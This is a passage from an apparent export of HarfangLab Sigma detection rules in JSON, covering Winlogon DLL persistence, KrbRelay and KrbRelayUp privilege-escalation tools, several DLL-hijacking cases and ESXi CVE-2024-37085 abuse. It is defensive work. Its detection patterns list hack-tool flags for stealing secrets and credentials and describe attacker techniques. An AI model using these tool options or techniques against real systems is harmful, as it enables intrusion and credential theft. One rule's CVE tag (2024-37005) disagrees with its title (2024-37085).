NT\\CurrentVersion\\Winlogon\\Notify\\WPKGLogon\\DLLName'\n Details: '?:\\Program Files\\wpkg\\wpkglogon.dll'\n\n exclusion_resavista:\n ProcessImage|endswith: '\\RESAVistaIDSClient.exe'\n TargetObject:\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details|endswith: '\\RESAVistaIDSClient.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20feacae-9a99-4ce6-8f8c-c02176cb730a",
"rule_name": "Winlogon Helper DLL Installed",
"rule_description": "Detects a change of the Winlogon configuration via registry modification.\nAttackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21030089-c22d-4b59-9389-818ed924fae4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095808Z",
"creation_date": "2026-03-23T11:45:34.095810Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095815Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cube0x0/KrbRelay/",
"https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/",
"https://attack.mitre.org/techniques/T1558/003/",
"https://attack.mitre.org/techniques/T1550/003/"
],
"name": "t1558_003_krbrelay_hacktool_usage.yml",
"content": "title: KrbRelay HackTool Executed\nid: 21030089-c22d-4b59-9389-818ed924fae4\ndescription: |\n Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\n KrbRelay has already been used by attackers to perform various Active Directory attacks.\n It is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\nreferences:\n - https://github.com/cube0x0/KrbRelay/\n - https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2023/07/06\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelay\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelay.exe'\n - OriginalFileName: 'KrbRelay.exe'\n\n selection_cmd_default:\n CommandLine|contains|all:\n - ' -spn '\n - ' -clsid '\n\n selection_cmd_option:\n CommandLine|contains:\n - ' -rbcd '\n - ' -shadowcred'\n - ' -add-groupmember '\n - ' -laps'\n - ' -ssl'\n - ' -console'\n - ' -add-privileges '\n - ' -secrets'\n - ' -service-add '\n - ' -session '\n\n selection_cmd_llmnr:\n CommandLine|contains|all:\n - ' -llmnr'\n - ' -spn '\n - ' -secrets'\n\n selection_cmd_ntlm:\n CommandLine|contains|all:\n - ' -session '\n - ' -clsid '\n - ' -ntlm'\n\n condition: selection_krb_name or (selection_cmd_default and selection_cmd_option) or selection_cmd_llmnr or selection_cmd_ntlm\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21030089-c22d-4b59-9389-818ed924fae4",
"rule_name": "KrbRelay HackTool Executed",
"rule_description": "Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\nKrbRelay has already been used by attackers to perform various Active Directory attacks.\nIt is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\n",
"rule_creation_date": "2023-07-06",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.003",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21167834-ee25-40c7-a927-f927643c10a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599004Z",
"creation_date": "2026-03-23T11:45:34.599007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599015Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iisexpresstray.yml",
"content": "title: DLL Hijacking via iisexpresstray.exe\nid: 21167834-ee25-40c7-a927-f927643c10a8\ndescription: |\n Detects potential Windows DLL Hijacking via iisexpresstray.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iisexpresstray.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21167834-ee25-40c7-a927-f927643c10a8",
"rule_name": "DLL Hijacking via iisexpresstray.exe",
"rule_description": "Detects potential Windows DLL Hijacking via iisexpresstray.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21216328-38a3-45d2-b301-ea234729a5e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610112Z",
"creation_date": "2026-03-23T11:45:34.610116Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610123Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/",
"https://attack.mitre.org/techniques/T1078/002"
],
"name": "t1078_002_possible_cve_2024_37085_exp_group.yml",
"content": "title: Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass\nid: 21216328-38a3-45d2-b301-ea234729a5e0\ndescription: |\n Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\n VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\n This group is not a built-in group in Active Directory and does not exist by default.\n It is recommended to investigate and determine if this is a legitimate administrative action.\nreferences:\n - https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/\n - https://attack.mitre.org/techniques/T1078/002\ndate: 2024/07/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2024-37005\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2024-37005\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID:\n - 4727 # Security-enabled Global Group was Created\n - 4728 # Member was Added to Security-enabled Global Group\n - 4755 # Security-enabled Universal Group was Created\n - 4756 # Member was Added to Security-enabled Universal Group\n GroupName: 'ESX Admins'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21216328-38a3-45d2-b301-ea234729a5e0",
"rule_name": "Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass",
"rule_description": "Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\nVMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nThis group is not a built-in group in Active Directory and does not exist by default.\nIt is recommended to investigate and determine if this is a legitimate administrative action.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098621Z",
"creation_date": "2026-03-23T11:45:34.098623Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098627Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_multidigimon.yml",
"content": "title: DLL Hijacking via multidigimon.exe\nid: 21364c07-fc54-4cf0-8a5e-4dd14ed9910d\ndescription: |\n Detects potential Windows DLL Hijacking via multidigimon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'multidigimon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\NInput.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d",
"rule_name": "DLL Hijacking via multidigimon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via multidigimon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2140fee8-47d6-4020-b659-5713bfec9a3c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075299Z",
"creation_date": "2026-03-23T11:45:34.075301Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075305Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Dec0ne/KrbRelayUp",
"https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19",
"https://attack.mitre.org/techniques/T1558/003/",
"https://attack.mitre.org/techniques/T1550/003/"
],
"name": "t1558_003_krbrelayup_tool_usage.yml",
"content": "title: KrbRelayUp HackTool Executed\nid: 2140fee8-47d6-4020-b659-5713bfec9a3c\ndescription: |\n Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\n This tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\n It automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\n The tool also includes support for shadow credentials, eliminating the need for additional machine accounts. Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\n It is recommended to check the context of use of this tool and to look for other malicious actions on the host.\n If no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\nreferences:\n - https://github.com/Dec0ne/KrbRelayUp\n - https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2022/08/03\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelayUp\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelayUp.exe'\n - OriginalFileName: 'KrbRelayUp.exe'\n\n selection_cmd_relay:\n CommandLine|contains: ' relay '\n\n selection_cmd_spawn:\n CommandLine|contains: ' spawn '\n\n selection_cmd_krbscm:\n CommandLine|contains: ' krbscm '\n\n selection_cmd_domain:\n CommandLine|contains:\n - ' -d '\n - ' --Domain '\n - ' -Domain '\n\n selection_cmd_cn:\n CommandLine|contains:\n - ' -cn '\n - ' --ComputerName '\n - ' -ComputerName '\n\n selection_cmd_service_command:\n CommandLine|contains:\n - ' -s '\n - ' -sc '\n - ' --ServiceName '\n - ' --ServiceCommand'\n - ' -ServiceName '\n - ' -ServiceCommand'\n\n condition: selection_krb_name or\n ((selection_cmd_relay or selection_cmd_spawn) and selection_cmd_domain and selection_cmd_cn) or\n (selection_cmd_krbscm and selection_cmd_service_command)\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2140fee8-47d6-4020-b659-5713bfec9a3c",
"rule_name": "KrbRelayUp HackTool Executed",
"rule_description": "Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\nThis tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\nIt automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\nThe tool also includes support for shadow credentials, eliminating the need for additional machine accounts. Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\nIt is recommended to check the context of use of this tool and to look for other malicious actions on the host.\nIf no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\n",
"rule_creation_date": "2022-08-03",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.003",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21699dd6-a401-4ab8-bbda-d513d587c561",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593663Z",
"creation_date": "2026-03-23T11:45:34.593667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593675Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1564131230941122561",
"https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_deviceenroller.yml",
"content": "title: Phantom DLL Hijacking via DeviceEnroller.exe\nid: 21699dd6-a401-4ab8-bbda-d513d587c561\ndescription: |\n Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\n Phantom DLL Hijacking takes advantage of non-existing DLL that a legitimate application tries to load.\n Attackers used this technique by copying a malicious DLL to System32 under ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1564131230941122561\n - https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/30\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'deviceenroller.exe'\n ProcessCommandLine|contains: 'PhoneDeepLink'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\ShellChromeAPI.dll'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21699dd6-a401-4ab8-bbda-d513d587c561",
"rule_name": "Phantom DLL Hijacking via DeviceEnroller.exe",
"rule_description": "Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\nPhantom DLL Hijacking takes advantage of non-existing DLL that a legitimate application tries to load.\nAttackers used this technique by copying a malicious DLL to System32 under ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-30",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2169b294-00f6-4185-922a-6e8744093010",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627015Z",
"creation_date": "2026-03-23T11:45:34.627017Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627021Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_002_dll_hijacking_obs_ffmpeg_mux.yml",
"content": "title: DLL Hijacking via obs-ffmpeg-mux.exe\nid: 2169b294-00f6-4185-922a-6e8744093010\ndescription: |\n Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/01/08\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessName: 'obs-ffmpeg-mux.exe'\n ProcessSignature: 'Hugh Bailey'\n ImageLoaded|endswith: '\\obs.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\obs-studio\\bin\\64bit\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Hugh Bailey'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2169b294-00f6-4185-922a-6e8744093010",
"rule_name": "DLL Hijacking via obs-ffmpeg-mux.exe",
"rule_description": "Detects potential Windows DLL Hijacking via obs-ffmpeg-mux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2025-01-08",
"rule_modified_date": "2026-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "218a81a4-f938-453b-aa3e-57226b82c69c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
